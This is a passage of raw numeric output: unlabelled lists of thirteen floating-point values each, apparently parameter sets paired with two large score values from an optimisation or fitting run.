-1.4625361988654996e-10, -1.816149350524488e-15,\n 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06,\n -1.830053261436748e-08, 9.087619653117874e-10, 176677319245.07892, \n 101942928295.47075]\n[-8.324503936172223e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4535167828811644e-10, -1.799249889019179e-15,\n 8.763652695826297e-16, 2.4957985197946978e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.063398319687734e-10, 161710635101.41095, \n 104790698646.6004]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.8168585276282465e-11, -1.4675478300173032e-10, -\n 1.8210829282495652e-15, 8.725909439109588e-16, 2.4957985197946978e-05, \n -1.8015495121292713e-06, -1.830053261436748e-08, 9.102513898455556e-10,\n 160649925757.17908, 106424978687.80653]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.869384519400452e-11, -1.4675478300173032e-10, -1.799249889019179e-15,\n 8.765174154706532e-16, 2.4957985197946978e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.067222192179334e-10, 157509126624.7564, \n 106648081137.30634]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.924272863609467e-13, \n 4.87567764690249e-11, -1.473869541008466e-10, -1.8210829282495652e-15, \n 8.797810044472039e-16, 2.5128697145423343e-05, -1.8015495121292713e-06,\n -1.830053261436748e-08, 9.089655956213592e-10, 156027014786.34595, \n 106784848298.00577]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.9531413192683389e-13,\n 4.852404641399239e-11, -1.4675478300173032e-10, -1.8130493256774034e-15,\n 8.758120054489215e-16, 2.489589641570383e-05, -1.8015495121292713e-06, \n -1.836034443165441e-08, 9.120599461707459e-10, 159857940983.01962, \n 106918161793.97298]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9347415380665696e-13, \n 4.85631967683728e-11, -1.4675478300173032e-10, -1.8210829282495652e-15,\n 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06,\n -1.836417410231251e-08, 9.134390375783151e-10, 142628527511.76648, \n 117274357359.96004]\n[-2.0926038768787875e-10, -1.647013760811586e-12, -1.9567576322418712e-13, \n 4.852404641399239e-11, -1.4663924630161214e-10, -1.815921924023075e-15,\n 8.688144408462996e-16, 2.4957985197946978e-05, -1.8015495121292713e-06,\n -1.8287117187317536e-08, 9.120365536291957e-10, 136801158565.52109, \n 118996909122.33968]\n[-2.0926038768787875e-10, -1.3468298773490566e-12, -1.924272863609467e-13, \n 4.852404641399239e-11, -1.4730851235460287e-10, -1.8210829282495652e-15,\n 8.725909439109588e-16, 2.4957985197946978e-05, -1.8015495121292713e-06,\n -1.830053261436748e-08, 9.13148553316506e-10, 131221998343.07083, \n 125656067768.88814]\n[-8.372802930516975e-10, -1.6610460978653825e-12, -1.9391155389121011e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15,\n 8.765346456450067e-16, 2.500200335107093e-05, -1.777109321965829e-06, -\n 1.836034443165441e-08, 9.081976758127089e-10, 107442969837.9951, \n 191438895729.71088]\n[-8.373514643167848e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15,\n 8.705169785374419e-16, 2.4957985197946978e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.035879148460716e-10, 195862055252.448, \n 98829512345.71223]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4659424506650604e-10, -1.7864100157215748e-15,\n 8.706272486016714e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.836034443165441e-08, 9.087619653117874e-10, 185690352687.11697, \n 99223644222.007]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9475632661250835e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.803543054789903e-15,\n 8.839563844754409e-16, 2.4957985197946978e-05, -1.799557982850986e-06, \n -1.836034443165441e-08, 9.081976758127089e-10, 186222924740.70007, \n 100125948657.42978]\n[-8.29844666406642e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.849645416672899e-11, -1.4675478300173032e-10, -1.803543054789903e-15,\n 8.714032924475303e-16, 2.492800478197597e-05, -1.799557982850986e-06, -\n 1.836034443165441e-08, 9.081976758127089e-10, 190148608462.3534, \n 100180028793.61896]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.869384519400452e-11, -1.432701673757514e-10, -1.8130493256774034e-15,\n 8.765174154706532e-16, 2.5177177276929545e-05, -1.7997194394724915e-06,\n -1.850709631603352e-08, 9.087619653117874e-10, 199924589208.46686, \n 100223589650.82378]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9654069739659012e-13, \n 4.855683396544643e-11, -1.461461940090847e-10, -1.803543054789903e-15, \n 8.763652695826297e-16, 2.4957985197946978e-05, -1.8015495121292713e-06,\n -1.830053261436748e-08, 9.081976758127089e-10, 178626169889.2221, \n 100558408593.70113]\n[-8.332310924150067e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.8877585360256924e-11, -1.4675478300173032e-10, -\n 1.8130493256774034e-15, 8.763652695826297e-16, 2.4957985197946978e-05, \n -1.8015495121292713e-06, -1.836034443165441e-08, 9.087619653117874e-10,\n 193351738763.71564, 100949387586.23102]\n[-8.372802930516975e-10, -1.343853363763315e-12, -1.9192642832280474e-13, \n 4.852404641399239e-11, -1.446871529700577e-10, -1.8130493256774034e-15,\n 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.836034443165441e-08, 9.087619653117874e-10, 197397120636.1133, \n 101220474756.86967]\n[-2.081071620571536e-10, -1.3430194729908366e-12, -1.9531413192683389e-13, \n 4.8687777307168814e-11, -1.432701673757514e-10, -1.8195538935082505e-15,\n 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.830053261436748e-08, 9.081976758127089e-10, 189380748448.52612, \n 101440046940.05927]\n[-8.372802930516975e-10, -1.3382357152930057e-12, -1.9531413192683389e-13, \n 4.869384519400452e-11, -1.432701673757514e-10, -1.815921924023075e-15, \n 8.834544584685654e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.836034443165441e-08, 9.087619653117874e-10, 198690577754.9655, \n 101467426817.57397]\n[-2.0926038768787875e-10, -1.3359785407261977e-12, -1.924272863609467e-13, \n 4.8327983670281894e-11, -1.4675478300173032e-10, -\n 1.8258864221284576e-15, 8.83613368865103e-16, 2.492800478197597e-05, -\n 1.8015495121292713e-06, -1.8304452912365864e-08, 9.081976758127089e-10,\n 193392923341.53983, 101900620617.14302]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9719420123154376e-13, \n 4.861133464689211e-11, -1.483232636118454e-10, -1.8195538935082505e-15,\n 8.765174154706532e-16, 2.492800478197597e-05, -1.7966453439138136e-06, \n -1.836034443165441e-08, 9.087619653117874e-10, 174954502194.04602, \n 103131734300.077]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.814072294943091e-11, -1.437983579446461e-10, -1.8130493256774034e-15,\n 8.765174154706532e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.836034443165441e-08, 9.107645094765291e-10, 171249412831.2997, \n 103180541968.40872]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.476291648179518e-10, -1.7906363569860738e-15,\n 8.751158883884222e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.8221372696029056e-08, 9.081976758127089e-10, 154981149327.29538, \n 103805616436.34537]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.855683396544643e-11, -1.432701673757514e-10, -1.825643030416898e-15, \n 8.83613368865103e-16, 2.492800478197597e-05, -1.8015495121292713e-06, -\n 1.81828896229741e-08, 9.081976758127089e-10, 158250536108.31226, \n 106843736334.12831]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9439448414369486e-13, \n 4.855683396544643e-11, -1.4675478300173032e-10, -1.8130493256774034e-15,\n 8.765174154706532e-16, 2.5187119035976227e-05, -1.797858272312416e-06, \n -1.836034443165441e-08, 9.087619653117874e-10, 148433419780.93826, \n 110030788135.34956]\n[-8.372802930516975e-10, -1.3382357152930057e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.432701673757514e-10, -1.799249889019179e-15, \n 8.765174154706532e-16, 2.4802576523291093e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.087619653117874e-10, 152744383578.88885, \n 111006224451.55664]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9475632661250835e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.815921924023075e-15,\n 8.83613368865103e-16, 2.4957985197946978e-05, -1.8015495121292713e-06, \n -1.8140174569754755e-08, 9.081976758127089e-10, 140660582328.68314, \n 113087422800.04585]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.815921924023075e-15,\n 8.763652695826297e-16, 2.4957985197946978e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.081976758127089e-10, 148227079557.4723, \n 115101067854.69138]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15,\n 8.763652695826297e-16, 2.4957985197946978e-05, -1.7900208911755532e-06,\n -1.830053261436748e-08, 9.081976758127089e-10, 129686832886.01216, \n 126984206927.84627]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.869384519400452e-11, -1.4592095499147362e-10, -1.7864100157215748e-15,\n 8.706272486016714e-16, 2.5177177276929545e-05, -1.7997194394724915e-06,\n -1.850709631603352e-08, 9.087619653117874e-10, 188127979624.47858, \n 98138013390.26245]\n[-8.373514643167848e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.8139505305916955e-11, -1.4675478300173032e-10, -1.799249889019179e-15,\n 8.783887938075847e-16, 2.4957985197946978e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.035879148460716e-10, 195862055252.45816, \n 98829512345.71414]\n[-8.379785124926609e-10, -1.3292316984383345e-12, -1.955394873972143e-13, \n 4.852404641399239e-11, -1.4779126633130978e-10, -1.799249889019179e-15,\n 8.775397316555329e-16, 2.5049204386853816e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.035879148460716e-10, 183972070969.05157, \n 98891303611.42876]\n[-8.373750609204521e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.869384519400452e-11, -1.4659424506650604e-10, -1.7864100157215748e-15,\n 8.706272486016714e-16, 2.492800478197597e-05, -1.7997194394724915e-06, \n -1.836034443165441e-08, 9.087619653117874e-10, 176341783374.723, \n 99638222233.03885]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4696825367906723e-10, -1.799249889019179e-15,\n 8.705169785374419e-16, 2.4957985197946978e-05, -1.8015495121292713e-06,\n -1.836034443165441e-08, 9.087619653117874e-10, 187303786818.71506, \n 99962477826.90034]\n[-8.29844666406642e-10, -1.3259182588069894e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.803543054789903e-15,\n 8.839563844754409e-16, 2.492800478197597e-05, -1.799557982850986e-06, -\n 1.836034443165441e-08, 9.081976758127089e-10, 190148608462.3526, \n 100180028793.6191]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9475632661250835e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.803543054789903e-15,\n 8.839563844754409e-16, 2.4907384876305387e-05, -1.799557982850986e-06, \n -1.836034443165441e-08, 9.081976758127089e-10, 192885903228.52237, \n 100290100926.3771]\n[-8.372802930516975e-10, -1.340114474894997e-12, -1.9475632661250835e-13, \n 4.852404641399239e-11, -1.4659424506650604e-10, -1.803543054789903e-15,\n 8.839563844754409e-16, 2.492800478197597e-05, -1.8015495121292713e-06, \n -1.836034443165441e-08, 9.087619653117874e-10, 193159834117.98853, \n 100447140164.3877]\n[-8.45347775440883e-10, -1.3359785407261977e-12, -1.9409478257397567e-13, \n 4.852404641399239e-11, -1.463585775827913e-10, -1.812045689500589e-15, \n 8.706272486016714e-16, 2.4957985197946978e-05, -1.8015495121292713e-06,\n -1.836034443165441e-08, 9.087619653117874e-10, 192907161589.0385, \n 100872818268.9527]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.8130493256774034e-15,\n 8.705169785374419e-16, 2.4957985197946978e-05, -1.7997194394724915e-06,\n -1.836034443165441e-08, 9.087619653117874e-10, 183710210581.81177, \n 101076246798.6337]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.869384519400452e-11, -1.432701673757514e-10, -1.8130493256774034e-15,\n 8.765174154706532e-16, 2.542150809952725e-05, -1.7997194394724915e-06, \n -1.850709631603352e-08, 9.087619653117874e-10, 168715457724.7375, \n 101683114493.3993]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.849645416672899e-11, -1.432701673757514e-10, -1.803543054789903e-15, \n 8.765174154706532e-16, 2.5177177276929545e-05, -1.7997194394724915e-06,\n -1.836034443165441e-08, 9.087619653117874e-10, 153789626574.96255, \n 105699410466.83022]\n[-8.372802930516975e-10, -1.3398025228100945e-12, -1.9531413192683389e-13, \n 4.855683396544643e-11, -1.4675478300173032e-10, -1.803543054789903e-15,\n 8.714032924475303e-16, 2.4957985197946978e-05, -1.793948394990656e-06, \n -1.836034443165441e-08, 9.081976758127089e-10, 159560429502.34207, \n 105861289429.36061]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.869384519400452e-11, -1.432701673757514e-10, -1.7864100157215748e-15,\n 8.765174154706532e-16, 2.5177177276929545e-05, -1.7997194394724915e-06,\n -1.836034443165441e-08, 9.087619653117874e-10, 147461834890.53723, \n 106068644665.40553]\n[-8.372802930516975e-10, -1.3292316984383345e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4760843266911815e-10, -1.7864100157215748e-15,\n 8.706272486016714e-16, 2.492800478197597e-05, -1.7933608637070708e-06, \n -1.836034443165441e-08, 9.087979750822277e-10, 147793960453.4741, \n 109638154986.2024]\n[-8.29844666406642e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.8434260838579935e-11, -1.4561659265574012e-10, -1.819718397269023e-15,\n 8.775397316555329e-16, 2.4948775411850268e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.081976758127089e-10, 150492287670.62976, \n 114344342719.97507]\n[-8.406587076953522e-10, -1.318355348076889e-12, -1.9519777560623135e-13, \n 4.855683396544643e-11, -1.4760843266911815e-10, -1.815921924023075e-15,\n 8.839563844754409e-16, 2.4957985197946978e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.081976758127089e-10, 148227079557.78632, \n 115101067854.31332]\n[-8.389236670603421e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15,\n 8.717072130867646e-16, 2.4957985197946978e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.087619653117874e-10, 137339476236.27339, \n 120797794814.05704]\n[-8.373514643167848e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15,\n 8.705169785374419e-16, 2.492800478197597e-05, -1.786297491730252e-06, -\n 1.836034443165441e-08, 9.087619653117874e-10, 128365631923.39072, \n 133721716481.47603]\n[-8.361552586353477e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15,\n 8.705169785374419e-16, 2.483403849637781e-05, -1.783565701728919e-06, -\n 1.836034443165441e-08, 9.095300241628919e-10, 123047993752.2489, \n 147005409641.27127]\n[-9.129396902499863e-10, -1.290047843436073e-12, -2.702634930634393e-13, \n 4.58556551164694e-11, -1.8724359625458014e-10, -2.1792166675464865e-15,\n 9.365717147446797e-16, 1.8994698205972217e-05, -1.8050933870374392e-06,\n -1.3360134446642706e-08, 8.693561802236366e-10, 169675879824.58978, \n 156722470654.13324]\n[6.303262263534727e-10, -1.2096663849982051e-12, -2.5988950272728827e-13, \n 4.701662665204773e-11, -1.4934765549498044e-10, -2.0495920936053975e-15,\n 8.502785255135087e-16, 1.8814769194136882e-05, -1.8050933870374392e-06,\n -1.3247752346374906e-08, 8.693561802236366e-10, 108072398467.48868, \n 167972224844.19583]\n[6.303262263534727e-10, -1.2096663849982051e-12, -2.5988950272728827e-13, \n 4.701662665204773e-11, -1.4986345441105813e-10, -2.0495920936053975e-15,\n 8.502785255135087e-16, 1.8814769194136882e-05, -1.8050933870374392e-06,\n -1.3247752346374906e-08, 8.693561802236366e-10, 108072398467.75635, \n 167972224843.92523]\n[-9.212545260772544e-10, -1.290047843436073e-12, -1.8356995493902235e-13, \n 4.58556551164694e-11, -1.8724359625458014e-10, -2.1913589342035502e-15,\n 9.365717147446797e-16, 1.9540146753875297e-05, -1.8050933870374392e-06,\n -1.3360134446642706e-08, 8.693561802236366e-10, 117723326371.03189, \n 192873830899.82352]\n[6.303262263534727e-10, -1.290047843436073e-12, -2.5988950272728827e-13, \n 4.58556551164694e-11, -1.4986345441105813e-10, -2.1913589342035502e-15,\n 8.502785255135087e-16, 1.8814769194136882e-05, -1.8050933870374392e-06,\n -1.3247752346374906e-08, 8.693561802236366e-10, 164354464752.25952, \n 160840990423.46024]\n[6.354744988103506e-10, -1.2096663849982051e-12, -1.830526663998671e-13, \n 4.6589669053151376e-11, -1.4986345441105813e-10, -\n 2.0495920936053975e-15, 8.502785255135087e-16, 1.894858193847651e-05, -\n 1.8050933870374392e-06, -1.3247752346374906e-08, 8.693561802236366e-10,\n 96467208837.94556, 179586543004.98117]\n[-9.212545260772544e-10, -1.290047843436073e-12, -1.8356995493902235e-13, \n 4.58556551164694e-11, -1.8580228849463816e-10, -2.1913589342035502e-15,\n 9.365717147446797e-16, 1.9540146753875297e-05, -1.8218396850604304e-06,\n -1.3360134446642706e-08, 8.759216763039946e-10, 117765020064.66293, \n 187118262382.8758]\n[-9.129396902499863e-10, -1.3004166005044262e-12, -1.8356995493902235e-13, \n 4.58556551164694e-11, -1.8724359625458014e-10, -2.1913589342035502e-15,\n 9.365717147446797e-16, 1.962681376929987e-05, -1.8050933870374392e-06, \n -1.3418860642065019e-08, 8.693561802236366e-10, 122674650037.46736, \n 187415567631.77402]\n[-9.212545260772544e-10, -1.2799153483071088e-12, -1.8213920664100724e-13, \n 4.58556551164694e-11, -1.8724359625458014e-10, -2.1913589342035502e-15,\n 9.365717147446797e-16, 1.9540146753875297e-05, -1.8050933870374392e-06,\n -1.3360134446642706e-08, 8.693561802236366e-10, 117723326371.03189, \n 192873830899.82352]\n[-9.212545260772544e-10, -1.290047843436073e-12, -1.8356995493902235e-13, \n 4.6154548476823616e-11, -1.8724359625458014e-10, -\n 2.1913589342035502e-15, 9.358479354640953e-16, 1.9540146753875297e-05, \n -1.8050933870374392e-06, -1.3360134446642706e-08, 8.693561802236366e-10,\n 117723326371.02731, 192873830899.82806]\n[2.2152115305769157e-10, -1.6907719215642795e-12, -2.5108769063589337e-13, \n 4.9793760275117476e-11, -2.0780774158604122e-10, -\n 2.1593626664102876e-15, 8.836470142939426e-16, 2.0200374650352852e-05, \n -1.7639524821935923e-06, -1.5013783998899997e-08, 8.77876424822685e-10,\n 170388218306.66492, 168925348515.4128]\n[2.2152115305769157e-10, -1.6907719215642795e-12, -2.1051647732787472e-13, \n 4.9793760275117476e-11, -2.0780774158604122e-10, -\n 2.1790706433018085e-15, 8.836470142939426e-16, 2.0343533479720338e-05, \n -1.7639524821935923e-06, -1.5091093694835327e-08, 8.771058818345121e-10,\n 191821821495.1242, 158798904598.69617]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -2.1593626664102876e-15,\n 8.836470142939426e-16, 2.0217203662255432e-05, -1.7639524821935923e-06,\n -1.5013783998899997e-08, 8.771058818345121e-10, 177069079234.4985, \n 163375067226.8736]\n[2.213664545134999e-10, -1.2059133330572482e-12, -2.5108769063589337e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -2.1593626664102876e-15,\n 8.836470142939426e-16, 2.0200374650352852e-05, -1.7639524821935923e-06,\n -1.508245699810314e-08, 8.771058818345121e-10, 197879714583.27084, \n 152444791757.7255]\n[0.0, -1.223723210207519e-12, -2.1051647732787472e-13, \n 4.971358693780409e-11, -1.7352085678160897e-10, -2.165433707987142e-15,\n 7.304553415989529e-16, 2.0047355685146273e-05, -1.7657604268720381e-06,\n -1.4977385439375226e-08, 8.771058818345121e-10, 197945074606.02325, \n 153164597685.87036]\n[2.2152115305769157e-10, -1.1984578022968498e-12, -2.5108769063589337e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8426407940693324e-15,\n 7.430575474541962e-16, 2.0200374650352852e-05, -1.7639524821935923e-06,\n -1.5202351660972107e-08, 8.771058818345121e-10, 111986329581.05826, \n 155849166742.8801]\n[2.2133713135172913e-10, -1.2059133330572482e-12, -2.5107145183244764e-13, \n 5.011120217163613e-11, -1.724660990140153e-10, -2.1790706433018085e-15,\n 8.836470142939426e-16, 2.0200374650352852e-05, -1.7639524821935923e-06,\n -1.5013783998899997e-08, 8.771058818345121e-10, 187269085984.5673, \n 161472427331.15216]\n[0.0, -1.223723210207519e-12, -2.094909506024221e-13, 5.011120217163613e-11,\n -1.7677981323511262e-10, -2.145058695065051e-15, 7.430575474541962e-16,\n 2.0053347897812537e-05, -1.7639524821935923e-06, -\n 1.4682044872577598e-08, 8.728626586100963e-10, 152433850624.54852, \n 175966043507.07343]\n[0.0, -1.223723210207519e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -2.1790706433018085e-15,\n 7.430575474541962e-16, 1.9918519209106862e-05, -1.7685796144533914e-06,\n -1.4682044872577598e-08, 8.771058818345121e-10, 153535961138.3572, \n 184829802626.36642]\n[2.2152115305769157e-10, -1.200937983572784e-12, -2.1065990049856794e-13, \n 5.011120217163613e-11, -1.7420072583381303e-10, -1.8426407940693324e-15,\n 7.454251311051652e-16, 2.0200374650352852e-05, -1.7639524821935923e-06,\n -1.508245699810314e-08, 8.771058818345121e-10, 92670242378.77588, \n 189416231139.84406]\n[0.0, -1.2207456906260254e-12, -2.1065990049856794e-13, \n 4.9793760275117476e-11, -2.0772853669541976e-10, -\n 1.8426407940693324e-15, 7.430575474541962e-16, 1.9867416915370552e-05, \n -1.7639524821935923e-06, -1.5091093694835327e-08, 8.728626586100963e-10,\n 160631139543.06137, 122019730569.7476]\n[2.2152115305769157e-10, -1.1984578022968498e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7677981323511262e-10, -1.857281675942834e-15,\n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.5202351660972107e-08, 8.771058818345121e-10, 153487531028.94116, \n 128597452665.91768]\n[0.0, -1.2031098015567e-12, -2.5161591646068603e-13, 5.011120217163613e-11,\n -1.7849498396021264e-10, -1.82610373802557e-15, 7.430575474541962e-16, \n 1.981538293869461e-05, -1.7639524821935923e-06, -1.5202351660972107e-08,\n 8.771058818345121e-10, 142632578694.80914, 130195065921.46504]\n[2.2152115305769157e-10, -1.2003583976149596e-12, -2.5108769063589337e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8426407940693324e-15,\n 7.430575474541962e-16, 2.0200374650352852e-05, -1.7639524821935923e-06,\n -1.517941226634992e-08, 8.771058818345121e-10, 107861636975.64659, \n 161449199082.99103]\n[0.0, -1.223723210207519e-12, -2.094909506024221e-13, 5.011120217163613e-11,\n -1.7677981323511262e-10, -1.857281675942834e-15, 7.430575474541962e-16,\n 1.981538293869461e-05, -1.769936435419886e-06, -1.4682044872577598e-08,\n 8.728626586100963e-10, 100156348461.68698, 161778485371.36353]\n[0.0, -1.1984578022968498e-12, -2.1065990049856794e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8426407940693324e-15,\n 7.430575474541962e-16, 2.0200374650352852e-05, -1.7639524821935923e-06,\n -1.5091093694835327e-08, 8.760544278271184e-10, 100072993312.46272, \n 171303112707.4717]\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, \n 4.9793760275117476e-11, -1.7352085678160897e-10, -\n 1.8261648304268637e-15, 8.836470142939426e-16, 2.0343533479720338e-05, \n -1.7639524821935923e-06, -1.5202351660972107e-08, 8.771058818345121e-10,\n 97245352689.07887, 174341101475.58182]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 4.9675085987122204e-11, -1.7558160485557454e-10, -\n 1.8426407940693324e-15, 8.836470142939426e-16, 2.022642042947946e-05, -\n 1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10,\n 92503635735.71886, 182996786041.40976]\n[0.0, -1.223723210207519e-12, -2.094909506024221e-13, 5.011120217163613e-11,\n -1.7677981323511262e-10, -2.1612081417375267e-15, 7.470344646267989e-16,\n 2.0053347897812537e-05, -1.7639524821935923e-06, -\n 1.4645406166689473e-08, 8.730660207999707e-10, 148185335900.70355, \n 185221791801.95062]\n[2.2111462065028517e-10, -1.2207456906260254e-12, -2.1065990049856794e-13, \n 5.056589741460715e-11, -1.7420072583381303e-10, -1.8426407940693324e-15,\n 7.454251311051652e-16, 2.0200374650352852e-05, -1.7639524821935923e-06,\n -1.508245699810314e-08, 8.771058818345121e-10, 92670242378.76936, \n 189416231139.85312]\n[2.2152115305769157e-10, -1.2207456906260254e-12, -2.1065990049856794e-13, \n 5.011120217163613e-11, -1.7420072583381303e-10, -1.8276902524925885e-15,\n 8.836470142939426e-16, 2.0200374650352852e-05, -1.7639524821935923e-06,\n -1.5091093694835327e-08, 8.771058818345121e-10, 90666406593.2125, \n 190153350507.14474]\n[2.2152115305769157e-10, -1.2049195466583994e-12, -2.1065990049856794e-13, \n 4.98075339514226e-11, -1.7558160485557454e-10, -1.8426407940693324e-15,\n 7.454251311051652e-16, 2.0095046248399238e-05, -1.7639524821935923e-06,\n -1.5013783998899997e-08, 8.771058818345121e-10, 89706134652.28279, \n 197738317572.1617]\n[0.0, -1.2031098015567e-12, -2.1065990049856794e-13, 5.0102593857564815e-11,\n -1.7352085678160897e-10, -1.819039898810471e-15, 7.460417812765263e-16,\n 2.0200374650352852e-05, -1.7758673160173464e-06, -\n 1.5202351660972107e-08, 8.760544278271184e-10, 160476853944.9334, \n 119035825863.27417]\n[2.2152115305769157e-10, -1.2031098015567e-12, -2.5161591646068603e-13, \n 4.9793760275117476e-11, -1.7849498396021264e-10, -1.82610373802557e-15,\n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.5344868185414675e-08, 8.771058818345121e-10, 180743589801.84604, \n 120144468135.82727]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 4.947687927376915e-11, -1.7558160485557454e-10, -1.8426407940693324e-15,\n 8.836470142939426e-16, 2.04140411384885e-05, -1.7639524821935923e-06, -\n 1.5078308038358913e-08, 8.683463468773267e-10, 146622662638.346, \n 120359956158.03543]\n[0.0, -1.1984578022968498e-12, -2.094909506024221e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.857281675942834e-15,\n 7.430575474541962e-16, 2.0200374650352852e-05, -1.7813149517985466e-06,\n -1.5091093694835327e-08, 8.760544278271184e-10, 171477577754.58575, \n 120995758664.39177]\n[2.2152115305769157e-10, -1.1984578022968498e-12, -2.5108769063589337e-13, \n 4.9967768219433575e-11, -1.7352085678160897e-10, -\n 1.8426407940693324e-15, 7.430575474541962e-16, 2.0200374650352852e-05, \n -1.7639524821935923e-06, -1.5091093694835327e-08, 8.703632209100975e-10,\n 151029089477.88403, 121221447183.73479]\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15,\n 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06,\n -1.520980077906525e-08, 8.721578527250325e-10, 139696562348.4149, \n 123962248783.03809]\n[2.233355889138985e-10, -1.2031098015567e-12, -2.5108769063589337e-13, \n 5.011120217163613e-11, -1.7849498396021264e-10, -1.8426407940693324e-15,\n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.5202351660972107e-08, 8.771058818345121e-10, 148301377250.4212, \n 129257349906.46594]\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15,\n 7.448076765658434e-16, 2.0200374650352852e-05, -1.7728642137544318e-06,\n -1.517941226634992e-08, 8.771058818345121e-10, 131981382341.97574, \n 129372470770.49553]\n[0.0, -1.2031098015567e-12, -2.088572649745598e-13, 5.011120217163613e-11, \n -1.7849498396021264e-10, -1.82610373802557e-15, 8.836470142939426e-16, \n 1.981538293869461e-05, -1.7639524821935923e-06, -1.5202351660972107e-08,\n 8.771058818345121e-10, 142632578694.80914, 